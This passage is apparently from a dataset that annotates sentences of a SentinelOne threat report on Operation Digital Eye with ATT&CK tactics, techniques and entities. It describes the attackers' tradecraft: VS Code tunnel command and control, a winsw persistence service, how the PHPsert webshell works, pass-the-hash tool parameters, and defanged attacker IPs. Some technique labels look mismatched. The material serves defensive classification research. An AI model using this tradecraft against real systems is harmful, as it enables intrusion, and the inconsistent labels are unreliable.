"sentinel-62_SentinelOne_report-p1-s34-f5004c", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "For the pass-the-hash attacks, they used a custom modified version of Mimikatz, implemented in an executable named bK2o.exe In addition to the PHPsert webshell, the threat actors used two methods for remote command execution: SSH access, enabled by deploying authorized_keys files containing public keys for authentication, and Visual Studio Code Remote Tunnels.", "sentence_text": "This access includes the command terminal and file system, allowing activities such as command execution and file editing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s35-e678b9", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "This access includes the command terminal and file system, allowing activities such as command execution and file editing.", "sentence_text": "The Operation Digital Eye actors abused this functionality to maintain persistent backdoor access to compromised systems.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "The actors abused system functionality to maintain persistent backdoor access to compromised systems.", "entities": [ { "text": "Operation Digital Eye actors", "start": 4, "end": 32, "label": "ThreatActor" }, { "text": "abused this functionality to maintain persistent backdoor access", "start": 33, "end": 97, "label": "Action" }, { "text": "compromised systems", "start": 101, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s36-89201a", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "The Operation Digital Eye actors abused this functionality to maintain persistent backdoor access to compromised systems.", "sentence_text": "In an attempt to evade detection based on filesystem activity, the threat actors used %SystemRoot%\\Temp", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564", "name": "Hide Artifacts" } ], "procedure": "Threat actors used %SystemRoot%\\Temp to evade detection.", "entities": [ { "text": " the threat actors", "start": 62, "end": 80, "label": "ThreatActor" }, { "text": "attempt to evade", "start": 6, "end": 22, "label": "Action" }, { "text": "used %SystemRoot%\\Temp", "start": 81, "end": 103, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s37-124a4e", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "In an attempt to evade detection based on filesystem activity, the threat actors used %SystemRoot%\\Temp", "sentence_text": "and %ProgramData%\\Visual Studio Code as their primary working directories for storing tools and data.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564", "name": "Hide Artifacts" } ], "procedure": "Used %ProgramData%\\Visual Studio Code as a working directory to store tools and data.", "entities": [ { "text": "%ProgramData%\\Visual Studio Code as their primary working directories for storing tools and data", "start": 4, "end": 100, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s38-2d283b", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "and %ProgramData%\\Visual Studio Code as their primary working directories for storing tools and data.", "sentence_text": "%SystemRoot%\\Temp\nis a directory where Windows stores temporary files and is often monitored with less scrutiny.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s39-239d08", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "%SystemRoot%\\Temp\nis a directory where Windows stores temporary files and is often monitored with less scrutiny.", "sentence_text": "%ProgramData%\\Visual Studio Code was intended to appear as a legitimate directory associated with Visual Studio Code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s40-80280c", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "%ProgramData%\\Visual Studio Code was intended to appear as a legitimate directory associated with Visual Studio Code.", "sentence_text": "The intrusions were detected and interrupted before the attackers could proceed to further phases, such as exfiltrating data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s41-e41d97", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "The intrusions were detected and interrupted before the attackers could proceed to further phases, such as exfiltrating data.", "sentence_text": "Abuse of Visual Studio Code", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s42-57c693", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "Abuse of Visual Studio Code", "sentence_text": "The threat actors deployed a portable Visual Studio Code executable named code.exe , which is digitally signed by Microsoft, and used the winsw tool to run it as a Windows service.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" }, { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "Deployed a portable Visual Studio Code executable and ran it as a Windows service using winsw.", "entities": [ { "text": "The threat actors", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "Visual Studio Code", "start": 38, "end": 56, "label": "MalwareTool" }, { "text": "code.exe", "start": 74, "end": 82, "label": "MalwareTool" }, { "text": "winsw tool", "start": 138, "end": 148, "label": "MalwareTool" }, { "text": "deployed", "start": 18, "end": 26, "label": "Action" }, { "text": "used", "start": 129, "end": 133, "label": "Action" }, { "text": "to run", "start": 149, "end": 155, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s43-e21d4d", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "The threat actors deployed a portable Visual Studio Code executable named code.exe , which is digitally signed by Microsoft, and used the winsw tool to run it as a Windows service.", "sentence_text": "The winsw configuration file we retrieved indicates that the attackers created a service named Visual Studio Code Service , which executes code.exe with the tunnel command-line parameter at every system startup.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "Created a Windows service named Visual Studio Code Service that executes code.exe at every system startup.", "entities": [ { "text": "the attackers ", "start": 57, "end": 71, "label": "ThreatActor" }, { "text": "Visual Studio Code Service", "start": 95, "end": 121, "label": "MalwareTool" }, { "text": "winsw configuration file", "start": 4, "end": 28, "label": "MalwareTool" }, { "text": " code.exe", "start": 138, "end": 147, "label": "MalwareTool" }, { "text": "created a service ", "start": 71, "end": 89, "label": "Action" }, { "text": "executes code.exe", "start": 130, "end": 147, "label": "Action" }, { "text": "at every system startup", "start": 187, "end": 210, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s44-3c687f", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "The winsw configuration file we retrieved indicates that the attackers created a service named Visual Studio Code Service , which executes code.exe with the tunnel command-line parameter at every system startup.", "sentence_text": "The configuration file reveals a pragmatic approach by the threat actors, who likely modified a publicly available winsw configuration.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "Modified a publicly available winsw configuration file.", "entities": [ { "text": "the threat actors", "start": 55, "end": 72, "label": "ThreatActor" }, { "text": "winsw configuration.", "start": 115, "end": 135, "label": "MalwareTool" }, { "text": "modified a publicly available winsw configuration.", "start": 85, "end": 135, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s45-e95860", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "The configuration file reveals a pragmatic approach by the threat actors, who likely modified a publicly available winsw configuration.", "sentence_text": "This is suggested by the use of the myapp service identifier and the %BASE%\\logs directory for storing winsw log files, both of which appear in the public configuration file as well as in the one we retrieved.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s46-e4e767", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "This is suggested by the use of the myapp service identifier and the %BASE%\\logs directory for storing winsw log files, both of which appear in the public configuration file as well as in the one we retrieved.", "sentence_text": "The\ntunnel\nparameter instructs Visual Studio Code to create a dev tunnel and act as a server to which remote users can connect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s47-fd9c44", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "The\ntunnel\nparameter instructs Visual Studio Code to create a dev tunnel and act as a server to which remote users can connect.", "sentence_text": "After authenticating to the tunnel with a Microsoft or GitHub account, remote users can access the endpoint running the Visual Studio Code server, either through the Visual Studio Code desktop application or the browser-based version, vscode.dev After creating the dev tunnels, the threat actors authenticated using GitHub accounts and accessed the compromised endpoints through the browser-based version of Visual Studio Code.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "Authenticated to dev tunnels using GitHub accounts and accessed compromised endpoints through Visual Studio Code (desktop or browser-based).", "entities": [ { "text": "the threat actors", "start": 278, "end": 295, "label": "ThreatActor" }, { "text": "Visual Studio Code desktop application", "start": 166, "end": 204, "label": "MalwareTool" }, { "text": " Visual Studio Code server", "start": 119, "end": 145, "label": "MalwareTool" }, { "text": "vscode.dev", "start": 235, "end": 245, "label": "MalwareTool" }, { "text": " endpoint running the Visual Studio Code server", "start": 98, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "dev tunnels", "start": 265, "end": 276, "label": "Infrastructure_Indicator" }, { "text": "authenticated using GitHub accounts", "start": 296, "end": 331, "label": "Action" }, { "text": "accessed the compromised endpoints", "start": 336, "end": 370, "label": "Action" }, { "text": "creating the dev tunnels", "start": 252, "end": 276, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s48-d24275", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "After authenticating to the tunnel with a Microsoft or GitHub account, remote users can access the endpoint running the Visual Studio Code server, either through the Visual Studio Code desktop application or the browser-based version, vscode.dev After creating the dev tunnels, the threat actors authenticated using GitHub accounts and accessed the compromised endpoints through the browser-based version of Visual Studio Code.", "sentence_text": "We have no knowledge of whether the threat actors used self-registered or compromised GitHub accounts to authenticate to the tunnels.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s49-69d0cf", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "We have no knowledge of whether the threat actors used self-registered or compromised GitHub accounts to authenticate to the tunnels.", "sentence_text": "Network Infrastructure\nThe Operation Digital Eye actors used infrastructure located exclusively within Europe, sourced from the provider M247 and the Cloud platform Microsoft Azure.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Used infrastructure hosted in Europe via M247 and Microsoft Azure.", "entities": [ { "text": "Operation Digital Eye actors", "start": 27, "end": 55, "label": "ThreatActor" }, { "text": "infrastructure located exclusively within Europe", "start": 61, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "M247", "start": 137, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Azure.", "start": 165, "end": 181, "label": "Infrastructure_Indicator" }, { "text": "used infrastructure located exclusively within Europe, sourced from the provider M247 and the Cloud platform Microsoft Azure.", "start": 56, "end": 181, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s50-4260e9", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Network Infrastructure\nThe Operation Digital Eye actors used infrastructure located exclusively within Europe, sourced from the provider M247 and the Cloud platform Microsoft Azure.", "sentence_text": "This was likely part of a deliberate strategy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s51-3269a6", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "This was likely part of a deliberate strategy.", "sentence_text": "Since the targeted organizations are based and operate within Europe, the attackers may have aimed to minimize suspicion by aligning their infrastructure’s location with that of their targets.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Aligned infrastructure location with that of their European targets to minimize suspicion.", "entities": [ { "text": "the attackers", "start": 70, "end": 83, "label": "ThreatActor" }, { "text": "infrastructure’s location", "start": 139, "end": 164, "label": "Infrastructure_Indicator" }, { "text": "aimed to minimize suspicion by aligning their infrastructure’s location", "start": 93, "end": 164, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s52-f1ee83", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "Since the targeted organizations are based and operate within Europe, the attackers may have aimed to minimize suspicion by aligning their infrastructure’s location with that of their targets.", "sentence_text": "In the initial phases of the attacks, the threat actors used the server with IP address 146.70.161[.]78 to establish initial access by detecting and exploiting SQL injection vulnerabilities, and the server with IP address 185.76.78[.]117 to operate the PHPsert webshell.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Established initial access by exploiting SQL injection vulnerabilities using 146.70.161[.]78; operated PHPsert webshell using 185.76.78[.]117.", "entities": [ { "text": "threat actors", "start": 42, "end": 55, "label": "ThreatActor" }, { "text": "PHPsert webshell.", "start": 253, "end": 270, "label": "MalwareTool" }, { "text": "146.70.161[.]78", "start": 88, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "185.76.78[.]117", "start": 222, "end": 237, "label": "Infrastructure_Indicator" }, { "text": "establish initial access by detecting and exploiting SQL injection vulnerabilities,", "start": 107, "end": 190, "label": "Action" }, { "text": "operate the PHPsert webshell.", "start": 241, "end": 270, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s53-253523", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "In the initial phases of the attacks, the threat actors used the server with IP address 146.70.161[.]78 to establish initial access by detecting and exploiting SQL injection vulnerabilities, and the server with IP address 185.76.78[.]117 to operate the PHPsert webshell.", "sentence_text": "Both IP addresses are allocated to the infrastructure provider M247 and are located in Poland and Italy, respectively.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s54-9073af", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "Both IP addresses are allocated to the infrastructure provider M247 and are located in Poland and Italy, respectively.", "sentence_text": "In the later phases of the attacks, the threat actors used the server with IP address 4.232.170[.]137 for C2 purposes when remotely accessing compromised endpoints via the SSH protocol.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Used IP 4.232.170[.]137 as a C2 server to remotely access compromised endpoints via SSH.", "entities": [ { "text": "the threat actors", "start": 36, "end": 53, "label": "ThreatActor" }, { "text": "4.232.170[.]137", "start": 86, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "used the server with IP address 4.232.170[.]137 for C2 purposes", "start": 54, "end": 117, "label": "Action" }, { "text": "emotely accessing compromised endpoints via the SSH protocol.", "start": 124, "end": 185, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s55-eae496", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "In the later phases of the attacks, the threat actors used the server with IP address 4.232.170[.]137 for C2 purposes when remotely accessing compromised endpoints via the SSH protocol.", "sentence_text": "This server is part of Microsoft’s Azure infrastructure in the Italy North datacenter region ( Azure IP range :\n4.232.128[.]0/18\n,\nservice tag\n:\nAzureCloud.italynorth\n).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s56-6300f7", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "This server is part of Microsoft’s Azure infrastructure in the Italy North datacenter region ( Azure IP range :\n4.232.128[.]0/18\n,\nservice tag\n:\nAzureCloud.italynorth\n).", "sentence_text": "We currently have no information on whether the threat actors used self-registered or compromised Azure credentials to access and manage the Azure resources and services.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1569.002", "name": "Service Execution" } ], "procedure": "Potential use of self-registered or compromised Azure credentials to access and manage Azure resources.", "entities": [ { "text": "threat actors", "start": 48, "end": 61, "label": "ThreatActor" }, { "text": "Azure resources and services.", "start": 141, "end": 170, "label": "Infrastructure_Indicator" }, { "text": " used self-registered or compromised Azure credentials to access and manage the Azure resources and services.", "start": 61, "end": 170, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s57-b7f924", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "We currently have no information on whether the threat actors used self-registered or compromised Azure credentials to access and manage the Azure resources and services.", "sentence_text": "The abuse of Visual Studio Code tunneling for C2 purposes also relies on Microsoft Azure infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Abuse of Visual Studio Code tunneling for command and control over Microsoft Azure infrastructure.", "entities": [ { "text": "Visual Studio Code tunneling", "start": 13, "end": 41, "label": "MalwareTool" }, { "text": "Microsoft Azure infrastructure.", "start": 73, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "abuse of Visual Studio Code tunneling for C2 purposes", "start": 4, "end": 57, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s58-b926df", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "The abuse of Visual Studio Code tunneling for C2 purposes also relies on Microsoft Azure infrastructure.", "sentence_text": "Creating and hosting a dev tunnel requires connecting to a Microsoft Azure server with a domain of *.[clusterID].devtunnels.ms , where [clusterID]\ncorresponds to the Azure region of the endpoint running the Visual Studio Code server, such as euw for West Europe .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Creating and hosting a dev tunnel by connecting to Microsoft Azure servers with domains of the form .[clusterID].devtunnels.ms corresponding to the endpoint region", "entities": [ { "text": "Visual Studio Code server", "start": 207, "end": 232, "label": "MalwareTool" }, { "text": "dev tunnel", "start": 23, "end": 33, "label": "MalwareTool" }, { "text": " Microsoft Azure server ", "start": 58, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "[clusterID].devtunnels.ms ", "start": 101, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "euw for West Europe ", "start": 242, "end": 262, "label": "Infrastructure_Indicator" }, { "text": "Creating and hosting a dev tunnel", "start": 0, "end": 33, "label": "Action" }, { "text": "connecting to a Microsoft Azure server ", "start": 43, "end": 82, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s59-2c12b0", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "Creating and hosting a dev tunnel requires connecting to a Microsoft Azure server with a domain of *.[clusterID].devtunnels.ms , where [clusterID]\ncorresponds to the Azure region of the endpoint running the Visual Studio Code server, such as euw for West Europe .", "sentence_text": "In Operation Digital Eye, the creation of dev tunnels involved establishing connections to the server with the domain [REDACTED].euw.devtunnels[.]ms , which resolved to the IP address 20.103.221[.]187 .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Establishing dev tunnels by connecting to [REDACTED].euw.devtunnels[.]ms (IP 20.103.221[.]187) as part of Operation Digital Eye.", "entities": [ { "text": "Operation Digital Eye", "start": 3, "end": 24, "label": "ThreatActor" }, { "text": "dev tunnels", "start": 42, "end": 53, "label": "MalwareTool" }, { "text": "[REDACTED].euw.devtunnels[.]ms", "start": 118, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "20.103.221[.]187 .", "start": 184, "end": 202, "label": "Infrastructure_Indicator" }, { "text": "establishing connections to the server ", "start": 63, "end": 102, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s60-75e7b6", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "In Operation Digital Eye, the creation of dev tunnels involved establishing connections to the server with the domain [REDACTED].euw.devtunnels[.]ms , which resolved to the IP address 20.103.221[.]187 .", "sentence_text": "This server is part of Microsoft’s Azure infrastructure in the West Europe datacenter region (Azure IP range:\n20.103.0[.]0/16\n, service tag:\nAzureCloud.westeurope\n).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s61-31eb9f", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "This server is part of Microsoft’s Azure infrastructure in the West Europe datacenter region (Azure IP range:\n20.103.0[.]0/16\n, service tag:\nAzureCloud.westeurope\n).", "sentence_text": "The PHPsert webshell operates as follows:\nPHPsert instantiates a class with a single regular method, which XOR-decodes and concatenates hexadecimal characters to generate the string assert .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "PHPsert XOR-decodes and concatenates hex characters to generate the string assert.", "entities": [ { "text": "PHPsert webshell", "start": 4, "end": 20, "label": "MalwareTool" }, { "text": "PHPsert", "start": 42, "end": 49, "label": "MalwareTool" }, { "text": "instantiates a class", "start": 50, "end": 70, "label": "Action" }, { "text": "OR-decodes and concatenates hexadecimal characters", "start": 108, "end": 158, "label": "Action" }, { "text": "generate the string assert .", "start": 162, "end": 190, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s62-db5db7", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "The PHPsert webshell operates as follows:\nPHPsert instantiates a class with a single regular method, which XOR-decodes and concatenates hexadecimal characters to generate the string assert .", "sentence_text": "The class’s destructor (the magic method __destruct ) uses this string to invoke the assert function, passing attacker-provided PHP code as a parameter.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "invoke the assert function with attacker-provided PHP code", "entities": [ { "text": "uses this string to invoke the assert function, passing attacker-provided PHP code", "start": 54, "end": 136, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s63-06f598", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "The class’s destructor (the magic method __destruct ) uses this string to invoke the assert function, passing attacker-provided PHP code as a parameter.", "sentence_text": "If the id parameter is present in the request URL, PHPsert decodes the Base64-encoded value of the POST parameter.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "decodes the Base64-encoded value of the POST parameter", "entities": [ { "text": "PHPsert ", "start": 51, "end": 59, "label": "MalwareTool" }, { "text": "decodes the Base64-encoded value of the POST parameter", "start": 59, "end": 113, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s64-e4bde3", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "If the id parameter is present in the request URL, PHPsert decodes the Base64-encoded value of the POST parameter.", "sentence_text": "If the id parameter is absent, the webshell uses the raw value of the parameter.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "uses the raw value of the parameter", "entities": [ { "text": "webshell", "start": 35, "end": 43, "label": "MalwareTool" }, { "text": "uses the raw value of the parameter.", "start": 44, "end": 80, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s65-0b7577", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "If the id parameter is absent, the webshell uses the raw value of the parameter.", "sentence_text": "Our analysis suggests that PHPsert is deployed not only as a standalone PHP file but is also integrated into various types of web content, including web text editors and content management systems.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "PHPsert is deployed not only as a standalone PHP file but is also integrated into various types of web content", "entities": [ { "text": "PHPsert ", "start": 27, "end": 35, "label": "MalwareTool" }, { "text": "s deployed not only as a standalone PHP file but is also integrated into various types of web content", "start": 36, "end": 137, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s66-9c15ce", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "Our analysis suggests that PHPsert is deployed not only as a standalone PHP file but is also integrated into various types of web content, including web text editors and content management systems.", "sentence_text": "One of the PHPsert variants contains commented-out code snippets and comments in simplified Chinese that describe nearby code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s67-f9710f", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "One of the PHPsert variants contains commented-out code snippets and comments in simplified Chinese that describe nearby code.", "sentence_text": "These comments and snippets are not present in the PHPsert versions observed in Operation Digital Eye, nor in any of the webshell’s other variants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s68-127a95", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "These comments and snippets are not present in the PHPsert versions observed in Operation Digital Eye, nor in any of the webshell’s other variants.", "sentence_text": "Pass-the-Hash Capability\nThe\nbK2o.exe\nexecutable (a custom modified version of Mimikatz used in Operation Digital Eye for pass-the-hash attacks) enables the execution of processes within a user’s security context by leveraging a compromised NTLM password hash, bypassing the need for the user’s actual password.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s69-df4ead", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "Pass-the-Hash Capability\nThe\nbK2o.exe\nexecutable (a custom modified version of Mimikatz used in Operation Digital Eye for pass-the-hash attacks) enables the execution of processes within a user’s security context by leveraging a compromised NTLM password hash, bypassing the need for the user’s actual password.", "sentence_text": "To achieve this, bK2o.exe overwrites memory of the LSASS process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s70-22b497", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "To achieve this, bK2o.exe overwrites memory of the LSASS process.", "sentence_text": "The tool supports the following command-line parameters:\n/c\n: The process to execute; defaults to cmd.exe if not provided.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s72-e75066", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "/u\n:", "sentence_text": "The user’s username.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s74-e14335", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "/d\n:", "sentence_text": "The user’s domain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s75-99fc6b", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "The user’s domain.", "sentence_text": "/h\n: The NTLM password hash.\nbK2o.exe\nimplements a pass-the-hash technique by overwriting LSASS memory in a manner similar to Mimikatz, with its implementation partially overlapping with Mimikatz functions such as kuhl_m_sekurlsa_pth_luid and kuhl_m_sekurlsa_msv_enum_cred_callback_pth .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s76-8fb997", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "/h\n: The NTLM password hash.\nbK2o.exe\nimplements a pass-the-hash technique by overwriting LSASS memory in a manner similar to Mimikatz, with its implementation partially overlapping with Mimikatz functions such as kuhl_m_sekurlsa_pth_luid and kuhl_m_sekurlsa_msv_enum_cred_callback_pth .", "sentence_text": "In summary, bK2o.exe performs the following:\nCreates\na suspended process in a new logon session, specifying the attacker-provided process, username, domain, and an empty password.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1134", "name": "Access Token Manipulation" } ], "procedure": "Creates a suspended process in a new logon session", "entities": [ { "text": "bK2o.exe ", "start": 12, "end": 21, 